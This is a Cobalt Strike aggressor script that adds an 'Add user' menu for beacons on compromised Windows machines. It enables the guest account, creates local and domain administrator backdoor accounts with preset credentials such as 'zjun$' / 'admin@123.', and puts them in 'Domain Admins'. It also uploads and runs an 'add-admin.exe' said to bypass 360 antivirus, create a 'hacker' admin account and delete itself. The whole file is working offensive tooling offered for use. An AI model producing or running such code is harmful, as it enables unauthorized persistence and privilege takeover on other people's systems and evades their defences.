menu "Add user" {
  item "Activate guest users" {
    $bid = $1['@'];
    bshell($bid, "net user guest /active:yes");
  }

  item "Create admin user" {
    $bid = $1['@'];
    $Dialog = dialog("Add local admin user",%(username => "zjun$", passwd => "admin@123.", "groups" => "administrators", bid => $bid),&add_localuser);
    dialog_description($Dialog, "Add local admin user，Pay attention to the password complexity in the account policy.");
    drow_text($Dialog, "username", "username: ");
    drow_text($Dialog, "passwd", "passwd: ");
    drow_text($Dialog, "groups", "groups: ");
    dbutton_action($Dialog, "run");
    dialog_show($Dialog);
  }
  sub add_localuser{
    local('$Name');
    $Name = $3['username'];
    $Pwd = $3['passwd'];
    $groups = $3['groups'];
    bshell($bid, "net user $Name $Pwd /add && net localgroup $groups $Name /add");
  }

  item "Add domain management user"{
    $bid = $1['@'];
    $Dialog = dialog("Add domain management",%(username => "zjun$",passswd => "admin@123.",bid => $bid),&add_domainuser);
    dialog_description($Dialog, "Add domain administrator user，Pay attention to the password complexity in the account policy.");
    drow_text($Dialog, "username", "username: ");
    drow_text($Dialog, "passswd", "passswd: ");
    dbutton_action($Dialog, "run");
    dialog_show($Dialog);
  }
  sub add_domainuser{
    local('$Name');
    $Name = $3['username'];
    $Pwd = $3['passswd'];
    bshell($bid, "net user $Name $Pwd /add /domain && net group \"Domain Admins\" $Name /add /domain");
  }

  menu "add-admin(bypass)"{
    item "Upload add-admin"{
      local('$bid');
      foreach $bid ($1){
        bupload($1, script_resource("/scripts/Add user/add-admin.exe"));
        blog($1, "Project address：https://github.com/lengjibo/RedTeamTools/blob/master/windows/bypass360%E5%8A%A0%E7%94%A8%E6%88%B7/README.md")
      }
    }
    item "run add-admin" {
      $bid = $1['@'];
      $dialog = dialog("add-admin", %(bid => $bid), &add_admin);
      dialog_description($dialog, "Automatically add an account to enter the administrator group after execution，And automatically delete the program. account number：hacker password：P@ssw0rd，Modify the account name in time after the addition is complete, too ostentatious.");
      dbutton_action($dialog, "run");
      dialog_show($dialog);
    }
    sub add_admin{
      bshell($bid, "add-admin.exe");
      bshell($bid, "del /f /s /q add-admin.exe");
    }
  }


}
